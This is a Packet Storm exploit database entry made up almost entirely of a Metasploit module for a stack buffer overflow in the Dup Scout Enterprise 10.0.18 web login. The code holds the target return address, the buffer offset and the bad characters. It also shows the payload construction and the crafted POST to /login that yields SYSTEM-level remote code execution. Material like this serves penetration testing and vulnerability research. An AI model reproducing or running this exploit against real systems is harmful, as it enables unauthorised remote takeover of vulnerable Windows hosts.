Dup Scout Enterprise 10.0.18 Buffer Overflow

2017-12-13T00:00:00
ID PACKETSTORM:145402
Type packetstorm
Reporter sickness
Modified 2017-12-13T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Dup Scout Enterprise Login Buffer Overflow',  
'Description' => %q{  
This module exploits a stack buffer overflow in Dup Scout Enterprise  
10.0.18. The buffer overflow exists via the web interface during  
login. This gives NT AUTHORITY\SYSTEM access.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Chris Higgins', # msf Module -- @ch1gg1ns  
'sickness' # Original discovery  
],  
'References' =>  
[  
[ 'EDB', '43145' ]  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'thread'  
},  
'Platform' => 'win',  
'Payload' =>  
{  
'BadChars' => "\x00\x0a\x0d\x25\x26\x2b\x3d"  
},  
'Targets' =>  
[  
[ 'Dup Scout Enterprise 10.0.18',  
{  
'Ret' => 0x10090c83, # jmp esp - libspp.dll  
'Offset' => 780  
}  
],  
],  
'Privileged' => true,  
'DisclosureDate' => 'Nov 14 2017',  
'DefaultTarget' => 0))  
  
register_options([Opt::RPORT(80)])  
  
end  
  
def check  
res = send_request_cgi({  
'uri' => '/',  
'method' => 'GET'  
})  
  
if res and res.code == 200 and res.body =~ /Dup Scout Enterprise v10\.0\.18/  
return Exploit::CheckCode::Appears  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
connect  
  
print_status("Generating exploit...")  
  
evil = rand_text(target['Offset'])  
evil << [target.ret].pack('V')  
evil << make_nops(12)  
evil << payload.encoded  
evil << make_nops(10000 - evil.length)  
  
vprint_status("Evil length: " + evil.length.to_s)  
  
sploit = "username="  
sploit << evil  
sploit << "&password="  
sploit << rand_text(evil.length)  
sploit << "\r\n"  
  
print_status("Triggering the exploit now...")  
  
res = send_request_cgi({  
'uri' => '/login',  
'method' => 'POST',  
'content-type' => 'application/x-www-form-urlencoded',  
'content-length' => '17000',  
'data' => sploit  
})  
  
handler  
disconnect  
  
end  
end  
`